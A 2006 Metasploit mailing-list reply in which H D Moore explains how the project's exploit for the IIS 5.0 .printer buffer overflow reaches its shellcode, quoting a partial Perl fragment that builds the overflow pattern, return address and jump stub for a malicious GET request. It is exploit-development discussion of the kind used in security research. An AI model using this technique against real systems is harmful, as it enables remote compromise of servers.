Metasploit mailing list archives
iis50_printer_overflow
From: hdm at metasploit.com (H D Moore)
Date: Thu, 2 Mar 2006 14:57:30 -0600
On Thursday 02 March 2006 14:49, Sonixxfx wrote:
I am trying to write an exploit for the "iis50_printer_overflow"
[ snip ]
The problem seems to be that I have few space available after the return address for the payload. I believe there is something about 240 bytes available. So my question is how can I make use of both the space available after the return address but also before the return address?
If you look at our exploit, we cheat. We stick our shellcode into the query string and then find it again by dereferencing ebx+96 (which happens to be a pointer, that when has 256+64 added to it, leads back into our shellcode): my $pattern = $self->MakeNops(280); substr($pattern, 268, 4, pack("V", $target->[1])); # payload is at: [ebx + 96] + 256 + 64 $pattern .= "\x8b\x4b\x60"; # mov ecx, [ebx + 96] $pattern .= "\x80\xc1\x40"; # add cl, 64 $pattern .= "\x80\xc5\x01"; # add ch, 1 $pattern .= "\xff\xe1"; # jmp ecx my $request = "GET http://$pattern/null.printer?$shellcode...
B.t.w. Nice looking man this morning on your website Metasploit ;)
That lovely image appears if you browse the web site with a hostname that doesn't appear to be 'metasploit.com' or one of our other domains. Let me know what URL you used to access the web site - it could be a bug. The purpose is to prevent people from hotlinking to images we host on our server. -HD
Current thread:
- iis50_printer_overflow Sonixxfx (Mar 02)
- iis50_printer_overflow H D Moore (Mar 02)
- iis50_printer_overflow Sonixxfx (Mar 03)
- iis50_printer_overflow Sonixxfx (Mar 03)
- iis50_printer_overflow Dave Killion (Mar 04)
- iis50_printer_overflow zodiac (Mar 04)
- iis50_printer_overflow Sonixxfx (Mar 07)
- iis50_printer_overflow H D Moore (Mar 07)
- iis50_printer_overflow Michael Boman (Mar 08)
- iis50_printer_overflow Peter Lee (Mar 08)
- iis50_printer_overflow pagvac (Mar 09)
- iis50_printer_overflow Sonixxfx (Mar 03)
- iis50_printer_overflow H D Moore (Mar 02)
- iis50_printer_overflow pagvac (Mar 09)